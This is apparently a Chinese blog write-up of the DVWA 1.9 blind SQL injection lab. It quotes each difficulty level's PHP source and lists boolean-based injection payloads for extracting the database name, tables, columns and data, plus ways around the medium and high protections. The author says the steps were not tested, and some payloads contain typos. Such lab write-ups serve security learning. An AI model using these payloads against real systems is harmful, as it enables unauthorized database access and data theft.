dvwa1.9之SQL injection(blind) | LSABLOG

首页 » NetworkSec » Penetration » 正文

dvwa1.9之SQL injection(blind)

low:

关键源码:

$id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

1.判断:

输入:1′ and 1=1;#

显示:User ID exists in the database.

输入:1′ and 1=2;#

显示:User ID is MISSING from the database.

可得是字符型注入

2.猜解当前数据库信息:

判断数据库长度:

输入:1′ and length(database())=1;#

显示:User ID is MISSING from the database.

输入:

显示:User ID exists in the database.

数据库名长度16.

猜解库名:

输入:1′ and ascii(substr(databse(),1,1))>97;#

显示:User ID is MISSING from the database.

输入:1′ and ascii(substr(databse(),1,1))<117;#

显示:User ID exists in the database.

就这样用二分法一直猜出库名。

3.猜表名:

输入:1′ and (select count (table_name) from information_schema.tables where table_schema=database() )=2;#

显示:User ID exists in the database.

可得数据库有2张表

输入:1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9;#

显示:User ID exists in the database.

可得第一张表名长度9

输入:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103;#

显示:User ID is MISSING from the database.

输入:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103;#

显示:User ID is MISSING from the database.

可得第一张表名第一个字符为g,继而可得表名。

4.猜字段信息

输入:1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8;#

显示:User ID exists in the database.

可得有8个字段

输入:1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7;#

显示:User ID exists in the database.

可得第一个字段长度7,继而用二分法同上猜出字段名

5.猜解数据

二分法同上

 

Medium:

关键源码:

 $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

加了mysql_real_escape_string过滤输入的字符,对特殊符号\x00,\n,\r,\,’,”,\x1a进行转义,前端用下拉表单限制用户输入。

抓包改即可,由于是整形注入,不需要用特殊字符。

 

High

 $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

cookie传参数,limit 1 限制结果,rand扰乱基于时间的盲注。#可以注释掉limit 1,用上面基于布尔的盲注即可。

 

Impossible

关键源码:

 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

token防止CSRF,pdo数据和代码分离,暂时无解。

==================================================

由于搭建的环境暂时不太方便,没有亲测,不过方法都是一样的,注入语句不止一种,达到目的就ok了。

Comment